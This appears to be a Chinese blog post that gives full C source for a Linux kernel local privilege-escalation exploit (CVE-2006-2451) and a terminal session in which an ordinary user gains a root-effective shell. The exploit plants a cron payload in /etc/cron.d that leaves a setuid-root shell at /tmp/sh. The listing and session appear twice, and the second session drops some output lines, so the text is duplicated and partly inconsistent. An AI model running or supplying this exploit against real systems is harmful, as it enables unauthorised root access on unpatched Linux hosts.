Linux Kernel PRCTL Core Dump Handling 本地提权漏洞利用代码（CVE-2006-2451）。注意：这并不是一个溢出漏洞——下面的代码没有任何越界写，它利用的是内核允许非特权进程通过 prctl(PR_SET_DUMPABLE, 2) 请求 setuid 风格的 core dump 模式，从而把进程的 core 文件以 root 身份写进 /etc/cron.d，再借 cron 执行其中的任务拿到 root shell。
受影响的内核版本：2.6.13 ≤ Kernel < 2.6.17.4（2.6.17.4 及以后版本已修复；下文实验机为 2.6.15，在受影响范围内）。
代码如下:
/*****************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer <luna@aditel.org> (main PoC code) */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/prctl.h>
#include <linux/prctl.h>
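/*
 * Bytes that have to end up inside the core file.  The child chdir()s to
 * /etc/cron.d before it is killed, so the core lands there as
 * /etc/cron.d/core, and the reproduction on this page shows cron still
 * running the "* * * * *" line despite the binary garbage around it.  That
 * line copies /bin/sh to /tmp/sh, makes it setuid root (chown root + 4755)
 * and then deletes the crontab fragment itself.
 *
 * Nothing in main() references this string; it only needs to be present in
 * the child's memory image.  Keep it a non-static global: an unreferenced
 * static object may be discarded by the compiler and nothing would reach
 * the dump.  Which mapping of the image actually carries the bytes on a
 * given build is not established by this listing -- confirm against a
 * core taken from the target.
 *
 * The transcript showed these escapes as "/n"; they must be real newlines,
 * otherwise cron sees a single unparsable line and the job never runs.
 */
char *payload = "\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";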
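/*
 * Entry point of the CVE-2006-2451 local root PoC (see the file header).
 *
 * Flow: raise RLIMIT_CORE, fork a child that chdir()s to /etc/cron.d and
 * asks for dump mode 2 via prctl(PR_SET_DUMPABLE, 2), then send it SIGSEGV.
 * On kernels 2.6.13 .. 2.6.17.3 the resulting /etc/cron.d/core is written
 * with root privileges and carries the `payload` bytes; cron runs that line
 * within a minute and leaves a setuid-root copy of /bin/sh at /tmp/sh,
 * which is then started with -p so effective uid 0 is kept (the transcript
 * on this page shows uid=501 euid=0).
 *
 * Changes against the original listing:
 *  - "/n" in every format string was a mangled "\n" and is restored;
 *  - setrlimit()/fork()/chdir()/prctl()/kill() results are checked.  A
 *    failed fork() used to fall through to kill(-1, SIGSEGV), which sends
 *    SIGSEGV to every process the caller may signal;
 *  - the parent waits on a pipe until the child has run prctl() before
 *    signalling; the original signalled right after fork() and relied on
 *    the child being scheduled first, otherwise the dump is an ordinary
 *    user-owned core in the current directory;
 *  - the child leaves with _exit() so it never re-flushes the parent's
 *    stdio buffers;
 *  - /tmp/sh is checked before it is executed, so a host that is not
 *    affected reports why nothing happened instead of a shell error.
 *
 * Side effects on an affected host: /etc/cron.d/core (removed by the cron
 * job itself) and a setuid-root shell at /tmp/sh that has to be removed by
 * hand.  A kernel carrying the fix is expected to refuse dump mode 2 from
 * an unprivileged process; the child then reports the prctl() error and
 * the program aborts.
 *
 * Returns EXIT_SUCCESS once the spawned shell exits, EXIT_FAILURE otherwise.
 */
int main(void) {
	int sync_fd[2];
	char ready;
	pid_t child;
	struct rlimit corelimit;

	printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
	printf("By: dreyer & RoMaNSoFt\n");
	printf("[ 10.Jul.2006 ]\n\n");

	/* Unlimited core size; the limit is inherited across fork().  An
	 * unprivileged process cannot raise rlim_max above the current hard
	 * limit, so a hard limit of 0 makes this fail (no core could be
	 * written in that case anyway). */
	corelimit.rlim_cur = RLIM_INFINITY;
	corelimit.rlim_max = RLIM_INFINITY;
	if (setrlimit(RLIMIT_CORE, &corelimit) < 0) {
		perror("setrlimit(RLIMIT_CORE)");
		return EXIT_FAILURE;
	}

	/* The child writes one byte here once prctl() has succeeded, so the
	 * parent never signals before the dump mode is in place. */
	if (pipe(sync_fd) < 0) {
		perror("pipe");
		return EXIT_FAILURE;
	}

	printf("Creating Cron entry\n");
	fflush(stdout);

	child = fork();
	if (child < 0) {
		perror("fork");
		return EXIT_FAILURE;
	}
	if (child == 0) {
		close(sync_fd[0]);
		/* The core is written into the dying process's current directory,
		 * so it has to be /etc/cron.d. */
		if (chdir("/etc/cron.d") < 0) {
			perror("chdir(/etc/cron.d)");
			_exit(1);
		}
		/* Dump mode 2: on the affected kernels an unprivileged process may
		 * request it and the core is then written with root privileges.
		 * A fixed kernel should refuse this call. */
		if (prctl(PR_SET_DUMPABLE, 2) < 0) {
			perror("prctl(PR_SET_DUMPABLE, 2)");
			_exit(1);
		}
		(void)write(sync_fd[1], "r", 1);
		close(sync_fd[1]);
		/* Wait for the SIGSEGV; give up on our own if it never arrives. */
		sleep(200);
		_exit(1);
	}

	close(sync_fd[1]);
	if (read(sync_fd[0], &ready, 1) != 1) {
		/* The child exited before reporting readiness; it printed why. */
		close(sync_fd[0]);
		fprintf(stderr, "child did not reach dump mode 2, giving up\n");
		return EXIT_FAILURE;
	}
	close(sync_fd[0]);

	/* SIGSEGV is a core-dumping signal: this is what writes /etc/cron.d/core. */
	if (kill(child, SIGSEGV) < 0) {
		perror("kill(SIGSEGV)");
		return EXIT_FAILURE;
	}

	printf(" Sleeping for aprox. one minute (** please wait **)\n");
	sleep(62); /* cron picks up /etc/cron.d and runs the "* * * * *" entry within a minute */

	/* Without this check the only symptom on an unaffected host would be
	 * "sh: /tmp/sh: No such file or directory". */
	if (access("/tmp/sh", X_OK) != 0) {
		fprintf(stderr, "/tmp/sh was not created: the core was not written as root or cron did not run it (kernel probably not affected)\n");
		return EXIT_FAILURE;
	}

	printf(" Running shell (remember to remove /tmp/sh when finished) ...\n");
	/* -p keeps the effective uid 0 granted by the setuid bit instead of dropping it. */
	if (system("/tmp/sh -p") == -1) {
		perror("system");
		return EXIT_FAILURE;
	}
	return EXIT_SUCCESS;
}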
实验过程如下:
[choatrue@localhost ~]$ uname -a
Linux localhost 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386 GNU/Linux
[choatrue@localhost ~]$ vi a.c
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
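/*
 * Bytes that have to end up inside the core file.  The child chdir()s to
 * /etc/cron.d before it is killed, so the core lands there as
 * /etc/cron.d/core, and the reproduction on this page shows cron still
 * running the "* * * * *" line despite the binary garbage around it.  That
 * line copies /bin/sh to /tmp/sh, makes it setuid root (chown root + 4755)
 * and then deletes the crontab fragment itself.
 *
 * Nothing in main() references this string; it only needs to be present in
 * the child's memory image.  Keep it a non-static global: an unreferenced
 * static object may be discarded by the compiler and nothing would reach
 * the dump.  Which mapping of the image actually carries the bytes on a
 * given build is not established by this listing -- confirm against a
 * core taken from the target.
 *
 * The transcript showed these escapes as "/n"; they must be real newlines,
 * otherwise cron sees a single unparsable line and the job never runs.
 */
char *payload = "\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";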
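/*
 * Entry point of the CVE-2006-2451 local root PoC (this is the copy typed
 * into a.c in the transcript; it lacks the <stdio.h> include of the
 * listing above, which only works because the compiler still accepts
 * implicitly declared printf()).
 *
 * Flow: raise RLIMIT_CORE, fork a child that chdir()s to /etc/cron.d and
 * asks for dump mode 2 via prctl(PR_SET_DUMPABLE, 2), then send it SIGSEGV.
 * On kernels 2.6.13 .. 2.6.17.3 the resulting /etc/cron.d/core is written
 * with root privileges and carries the `payload` bytes; cron runs that line
 * within a minute and leaves a setuid-root copy of /bin/sh at /tmp/sh,
 * which is then started with -p so effective uid 0 is kept (the transcript
 * on this page shows uid=501 euid=0).
 *
 * Changes against the original listing:
 *  - "/n" in every format string was a mangled "\n" and is restored;
 *  - setrlimit()/fork()/chdir()/prctl()/kill() results are checked.  A
 *    failed fork() used to fall through to kill(-1, SIGSEGV), which sends
 *    SIGSEGV to every process the caller may signal;
 *  - the parent waits on a pipe until the child has run prctl() before
 *    signalling; the original signalled right after fork() and relied on
 *    the child being scheduled first, otherwise the dump is an ordinary
 *    user-owned core in the current directory;
 *  - the child leaves with _exit() so it never re-flushes the parent's
 *    stdio buffers;
 *  - /tmp/sh is checked before it is executed, so a host that is not
 *    affected reports why nothing happened instead of a shell error.
 *
 * Side effects on an affected host: /etc/cron.d/core (removed by the cron
 * job itself) and a setuid-root shell at /tmp/sh that has to be removed by
 * hand.  A kernel carrying the fix is expected to refuse dump mode 2 from
 * an unprivileged process; the child then reports the prctl() error and
 * the program aborts.
 *
 * Returns EXIT_SUCCESS once the spawned shell exits, EXIT_FAILURE otherwise.
 */
int main(void) {
	int sync_fd[2];
	char ready;
	pid_t child;
	struct rlimit corelimit;

	printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
	printf("By: dreyer & RoMaNSoFt\n");
	printf("[ 10.Jul.2006 ]\n\n");

	/* Unlimited core size; the limit is inherited across fork().  An
	 * unprivileged process cannot raise rlim_max above the current hard
	 * limit, so a hard limit of 0 makes this fail (no core could be
	 * written in that case anyway). */
	corelimit.rlim_cur = RLIM_INFINITY;
	corelimit.rlim_max = RLIM_INFINITY;
	if (setrlimit(RLIMIT_CORE, &corelimit) < 0) {
		perror("setrlimit(RLIMIT_CORE)");
		return EXIT_FAILURE;
	}

	/* The child writes one byte here once prctl() has succeeded, so the
	 * parent never signals before the dump mode is in place. */
	if (pipe(sync_fd) < 0) {
		perror("pipe");
		return EXIT_FAILURE;
	}

	printf(" Creating Cron entry\n");
	fflush(stdout);

	child = fork();
	if (child < 0) {
		perror("fork");
		return EXIT_FAILURE;
	}
	if (child == 0) {
		close(sync_fd[0]);
		/* The core is written into the dying process's current directory,
		 * so it has to be /etc/cron.d. */
		if (chdir("/etc/cron.d") < 0) {
			perror("chdir(/etc/cron.d)");
			_exit(1);
		}
		/* Dump mode 2: on the affected kernels an unprivileged process may
		 * request it and the core is then written with root privileges.
		 * A fixed kernel should refuse this call. */
		if (prctl(PR_SET_DUMPABLE, 2) < 0) {
			perror("prctl(PR_SET_DUMPABLE, 2)");
			_exit(1);
		}
		(void)write(sync_fd[1], "r", 1);
		close(sync_fd[1]);
		/* Wait for the SIGSEGV; give up on our own if it never arrives. */
		sleep(200);
		_exit(1);
	}

	close(sync_fd[1]);
	if (read(sync_fd[0], &ready, 1) != 1) {
		/* The child exited before reporting readiness; it printed why. */
		close(sync_fd[0]);
		fprintf(stderr, "child did not reach dump mode 2, giving up\n");
		return EXIT_FAILURE;
	}
	close(sync_fd[0]);

	/* SIGSEGV is a core-dumping signal: this is what writes /etc/cron.d/core. */
	if (kill(child, SIGSEGV) < 0) {
		perror("kill(SIGSEGV)");
		return EXIT_FAILURE;
	}

	printf(" Sleeping for aprox. one minute (** please wait **)\n");
	sleep(62); /* cron picks up /etc/cron.d and runs the "* * * * *" entry within a minute */

	/* Without this check the only symptom on an unaffected host would be
	 * "sh: /tmp/sh: No such file or directory". */
	if (access("/tmp/sh", X_OK) != 0) {
		fprintf(stderr, "/tmp/sh was not created: the core was not written as root or cron did not run it (kernel probably not affected)\n");
		return EXIT_FAILURE;
	}

	printf(" Running shell (remember to remove /tmp/sh when finished) ...\n");
	/* -p keeps the effective uid 0 granted by the setuid bit instead of dropping it. */
	if (system("/tmp/sh -p") == -1) {
		perror("system");
		return EXIT_FAILURE;
	}
	return EXIT_SUCCESS;
}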
"a.c" [新] 51L, 1684C 已写入
[choatrue@localhost ~]$ gcc -o a a.c
[choatrue@localhost ~]$ id
uid=501(choatrue) gid=501(choatrue) groups=501(choatrue) context=user_u:system_r:unconfined_t
[choatrue@localhost ~]$ ./a
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]
Creating Cron entry
Sleeping for aprox. one minute (** please wait **)
Running shell (remember to remove /tmp/sh when finished) ...
sh-3.1# whoami
root
sh-3.1# id
uid=501(choatrue) gid=501(choatrue) euid=0(root) groups=501(choatrue) context=user_u:system_r:unconfined_t
sh-3.1#
HOHO，爽了吧。。。 注意：上面 id 的输出是 uid=501 而 euid=0，也就是说拿到的是通过 /tmp/sh -p 保留 setuid 特权的 shell，而不是一个真正的 root 登录会话。/tmp/sh 是一个 setuid root 的 shell，任何本机用户都能用它；测试结束后务必 rm -f /tmp/sh，并确认 cron 任务已经删掉了 /etc/cron.d/core。
代码如下:
/*****************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer <luna@aditel.org> (main PoC code) */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
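/*
 * Bytes that have to end up inside the core file.  The child chdir()s to
 * /etc/cron.d before it is killed, so the core lands there as
 * /etc/cron.d/core, and the reproduction on this page shows cron still
 * running the "* * * * *" line despite the binary garbage around it.  That
 * line copies /bin/sh to /tmp/sh, makes it setuid root (chown root + 4755)
 * and then deletes the crontab fragment itself.
 *
 * Nothing in main() references this string; it only needs to be present in
 * the child's memory image.  Keep it a non-static global: an unreferenced
 * static object may be discarded by the compiler and nothing would reach
 * the dump.  Which mapping of the image actually carries the bytes on a
 * given build is not established by this listing -- confirm against a
 * core taken from the target.
 *
 * The transcript showed these escapes as "/n"; they must be real newlines,
 * otherwise cron sees a single unparsable line and the job never runs.
 */
char *payload = "\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";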
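/*
 * Entry point of the CVE-2006-2451 local root PoC (see the file header).
 * Three printf() lines of this copy were truncated to `printf("` in the
 * transcript; their text is restored from the intact listing earlier on
 * the page.
 *
 * Flow: raise RLIMIT_CORE, fork a child that chdir()s to /etc/cron.d and
 * asks for dump mode 2 via prctl(PR_SET_DUMPABLE, 2), then send it SIGSEGV.
 * On kernels 2.6.13 .. 2.6.17.3 the resulting /etc/cron.d/core is written
 * with root privileges and carries the `payload` bytes; cron runs that line
 * within a minute and leaves a setuid-root copy of /bin/sh at /tmp/sh,
 * which is then started with -p so effective uid 0 is kept (the transcript
 * on this page shows uid=501 euid=0).
 *
 * Changes against the original listing:
 *  - "/n" in every format string was a mangled "\n" and is restored;
 *  - setrlimit()/fork()/chdir()/prctl()/kill() results are checked.  A
 *    failed fork() used to fall through to kill(-1, SIGSEGV), which sends
 *    SIGSEGV to every process the caller may signal;
 *  - the parent waits on a pipe until the child has run prctl() before
 *    signalling; the original signalled right after fork() and relied on
 *    the child being scheduled first, otherwise the dump is an ordinary
 *    user-owned core in the current directory;
 *  - the child leaves with _exit() so it never re-flushes the parent's
 *    stdio buffers;
 *  - /tmp/sh is checked before it is executed, so a host that is not
 *    affected reports why nothing happened instead of a shell error.
 *
 * Side effects on an affected host: /etc/cron.d/core (removed by the cron
 * job itself) and a setuid-root shell at /tmp/sh that has to be removed by
 * hand.  A kernel carrying the fix is expected to refuse dump mode 2 from
 * an unprivileged process; the child then reports the prctl() error and
 * the program aborts.
 *
 * Returns EXIT_SUCCESS once the spawned shell exits, EXIT_FAILURE otherwise.
 */
int main(void) {
	int sync_fd[2];
	char ready;
	pid_t child;
	struct rlimit corelimit;

	printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
	printf("By: dreyer & RoMaNSoFt\n");
	printf("[ 10.Jul.2006 ]\n\n");

	/* Unlimited core size; the limit is inherited across fork().  An
	 * unprivileged process cannot raise rlim_max above the current hard
	 * limit, so a hard limit of 0 makes this fail (no core could be
	 * written in that case anyway). */
	corelimit.rlim_cur = RLIM_INFINITY;
	corelimit.rlim_max = RLIM_INFINITY;
	if (setrlimit(RLIMIT_CORE, &corelimit) < 0) {
		perror("setrlimit(RLIMIT_CORE)");
		return EXIT_FAILURE;
	}

	/* The child writes one byte here once prctl() has succeeded, so the
	 * parent never signals before the dump mode is in place. */
	if (pipe(sync_fd) < 0) {
		perror("pipe");
		return EXIT_FAILURE;
	}

	printf("Creating Cron entry\n");
	fflush(stdout);

	child = fork();
	if (child < 0) {
		perror("fork");
		return EXIT_FAILURE;
	}
	if (child == 0) {
		close(sync_fd[0]);
		/* The core is written into the dying process's current directory,
		 * so it has to be /etc/cron.d. */
		if (chdir("/etc/cron.d") < 0) {
			perror("chdir(/etc/cron.d)");
			_exit(1);
		}
		/* Dump mode 2: on the affected kernels an unprivileged process may
		 * request it and the core is then written with root privileges.
		 * A fixed kernel should refuse this call. */
		if (prctl(PR_SET_DUMPABLE, 2) < 0) {
			perror("prctl(PR_SET_DUMPABLE, 2)");
			_exit(1);
		}
		(void)write(sync_fd[1], "r", 1);
		close(sync_fd[1]);
		/* Wait for the SIGSEGV; give up on our own if it never arrives. */
		sleep(200);
		_exit(1);
	}

	close(sync_fd[1]);
	if (read(sync_fd[0], &ready, 1) != 1) {
		/* The child exited before reporting readiness; it printed why. */
		close(sync_fd[0]);
		fprintf(stderr, "child did not reach dump mode 2, giving up\n");
		return EXIT_FAILURE;
	}
	close(sync_fd[0]);

	/* SIGSEGV is a core-dumping signal: this is what writes /etc/cron.d/core. */
	if (kill(child, SIGSEGV) < 0) {
		perror("kill(SIGSEGV)");
		return EXIT_FAILURE;
	}

	printf(" Sleeping for aprox. one minute (** please wait **)\n");
	sleep(62); /* cron picks up /etc/cron.d and runs the "* * * * *" entry within a minute */

	/* Without this check the only symptom on an unaffected host would be
	 * "sh: /tmp/sh: No such file or directory". */
	if (access("/tmp/sh", X_OK) != 0) {
		fprintf(stderr, "/tmp/sh was not created: the core was not written as root or cron did not run it (kernel probably not affected)\n");
		return EXIT_FAILURE;
	}

	printf(" Running shell (remember to remove /tmp/sh when finished) ...\n");
	/* -p keeps the effective uid 0 granted by the setuid bit instead of dropping it. */
	if (system("/tmp/sh -p") == -1) {
		perror("system");
		return EXIT_FAILURE;
	}
	return EXIT_SUCCESS;
}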
实验过程如下:
[choatrue@localhost ~]$ uname -a
Linux localhost 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386 GNU/Linux
[choatrue@localhost ~]$ vi a.c
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
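/*
 * Bytes that have to end up inside the core file.  The child chdir()s to
 * /etc/cron.d before it is killed, so the core lands there as
 * /etc/cron.d/core, and the reproduction on this page shows cron still
 * running the "* * * * *" line despite the binary garbage around it.  That
 * line copies /bin/sh to /tmp/sh, makes it setuid root (chown root + 4755)
 * and then deletes the crontab fragment itself.
 *
 * Nothing in main() references this string; it only needs to be present in
 * the child's memory image.  Keep it a non-static global: an unreferenced
 * static object may be discarded by the compiler and nothing would reach
 * the dump.  Which mapping of the image actually carries the bytes on a
 * given build is not established by this listing -- confirm against a
 * core taken from the target.
 *
 * The transcript showed these escapes as "/n"; they must be real newlines,
 * otherwise cron sees a single unparsable line and the job never runs.
 */
char *payload = "\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";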
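/*
 * Entry point of the CVE-2006-2451 local root PoC (this is the copy typed
 * into a.c in the transcript; it lacks the <stdio.h> include of the full
 * listing, which only works because the compiler still accepts implicitly
 * declared printf()).  Three printf() lines of this copy were truncated to
 * `printf("` in the transcript; their text is restored from the intact
 * a.c listing earlier on the page.
 *
 * Flow: raise RLIMIT_CORE, fork a child that chdir()s to /etc/cron.d and
 * asks for dump mode 2 via prctl(PR_SET_DUMPABLE, 2), then send it SIGSEGV.
 * On kernels 2.6.13 .. 2.6.17.3 the resulting /etc/cron.d/core is written
 * with root privileges and carries the `payload` bytes; cron runs that line
 * within a minute and leaves a setuid-root copy of /bin/sh at /tmp/sh,
 * which is then started with -p so effective uid 0 is kept (the transcript
 * on this page shows uid=501 euid=0).
 *
 * Changes against the original listing:
 *  - "/n" in every format string was a mangled "\n" and is restored;
 *  - setrlimit()/fork()/chdir()/prctl()/kill() results are checked.  A
 *    failed fork() used to fall through to kill(-1, SIGSEGV), which sends
 *    SIGSEGV to every process the caller may signal;
 *  - the parent waits on a pipe until the child has run prctl() before
 *    signalling; the original signalled right after fork() and relied on
 *    the child being scheduled first, otherwise the dump is an ordinary
 *    user-owned core in the current directory;
 *  - the child leaves with _exit() so it never re-flushes the parent's
 *    stdio buffers;
 *  - /tmp/sh is checked before it is executed, so a host that is not
 *    affected reports why nothing happened instead of a shell error.
 *
 * Side effects on an affected host: /etc/cron.d/core (removed by the cron
 * job itself) and a setuid-root shell at /tmp/sh that has to be removed by
 * hand.  A kernel carrying the fix is expected to refuse dump mode 2 from
 * an unprivileged process; the child then reports the prctl() error and
 * the program aborts.
 *
 * Returns EXIT_SUCCESS once the spawned shell exits, EXIT_FAILURE otherwise.
 */
int main(void) {
	int sync_fd[2];
	char ready;
	pid_t child;
	struct rlimit corelimit;

	printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
	printf("By: dreyer & RoMaNSoFt\n");
	printf("[ 10.Jul.2006 ]\n\n");

	/* Unlimited core size; the limit is inherited across fork().  An
	 * unprivileged process cannot raise rlim_max above the current hard
	 * limit, so a hard limit of 0 makes this fail (no core could be
	 * written in that case anyway). */
	corelimit.rlim_cur = RLIM_INFINITY;
	corelimit.rlim_max = RLIM_INFINITY;
	if (setrlimit(RLIMIT_CORE, &corelimit) < 0) {
		perror("setrlimit(RLIMIT_CORE)");
		return EXIT_FAILURE;
	}

	/* The child writes one byte here once prctl() has succeeded, so the
	 * parent never signals before the dump mode is in place. */
	if (pipe(sync_fd) < 0) {
		perror("pipe");
		return EXIT_FAILURE;
	}

	printf(" Creating Cron entry\n");
	fflush(stdout);

	child = fork();
	if (child < 0) {
		perror("fork");
		return EXIT_FAILURE;
	}
	if (child == 0) {
		close(sync_fd[0]);
		/* The core is written into the dying process's current directory,
		 * so it has to be /etc/cron.d. */
		if (chdir("/etc/cron.d") < 0) {
			perror("chdir(/etc/cron.d)");
			_exit(1);
		}
		/* Dump mode 2: on the affected kernels an unprivileged process may
		 * request it and the core is then written with root privileges.
		 * A fixed kernel should refuse this call. */
		if (prctl(PR_SET_DUMPABLE, 2) < 0) {
			perror("prctl(PR_SET_DUMPABLE, 2)");
			_exit(1);
		}
		(void)write(sync_fd[1], "r", 1);
		close(sync_fd[1]);
		/* Wait for the SIGSEGV; give up on our own if it never arrives. */
		sleep(200);
		_exit(1);
	}

	close(sync_fd[1]);
	if (read(sync_fd[0], &ready, 1) != 1) {
		/* The child exited before reporting readiness; it printed why. */
		close(sync_fd[0]);
		fprintf(stderr, "child did not reach dump mode 2, giving up\n");
		return EXIT_FAILURE;
	}
	close(sync_fd[0]);

	/* SIGSEGV is a core-dumping signal: this is what writes /etc/cron.d/core. */
	if (kill(child, SIGSEGV) < 0) {
		perror("kill(SIGSEGV)");
		return EXIT_FAILURE;
	}

	printf(" Sleeping for aprox. one minute (** please wait **)\n");
	sleep(62); /* cron picks up /etc/cron.d and runs the "* * * * *" entry within a minute */

	/* Without this check the only symptom on an unaffected host would be
	 * "sh: /tmp/sh: No such file or directory". */
	if (access("/tmp/sh", X_OK) != 0) {
		fprintf(stderr, "/tmp/sh was not created: the core was not written as root or cron did not run it (kernel probably not affected)\n");
		return EXIT_FAILURE;
	}

	printf(" Running shell (remember to remove /tmp/sh when finished) ...\n");
	/* -p keeps the effective uid 0 granted by the setuid bit instead of dropping it. */
	if (system("/tmp/sh -p") == -1) {
		perror("system");
		return EXIT_FAILURE;
	}
	return EXIT_SUCCESS;
}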
"a.c" [新] 51L, 1684C 已写入
[choatrue@localhost ~]$ gcc -o a a.c
[choatrue@localhost ~]$ id
uid=501(choatrue) gid=501(choatrue) groups=501(choatrue) context=user_u:system_r:unconfined_t
[choatrue@localhost ~]$ ./a
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]
sh-3.1# whoami
root
sh-3.1# id
uid=501(choatrue) gid=501(choatrue) euid=0(root) groups=501(choatrue) context=user_u:system_r:unconfined_t
sh-3.1#
HOHO，爽了吧。。。 注意：上面 id 的输出是 uid=501 而 euid=0，也就是说拿到的是通过 /tmp/sh -p 保留 setuid 特权的 shell，而不是一个真正的 root 登录会话。/tmp/sh 是一个 setuid root 的 shell，任何本机用户都能用它；测试结束后务必 rm -f /tmp/sh，并确认 cron 任务已经删掉了 /etc/cron.d/core。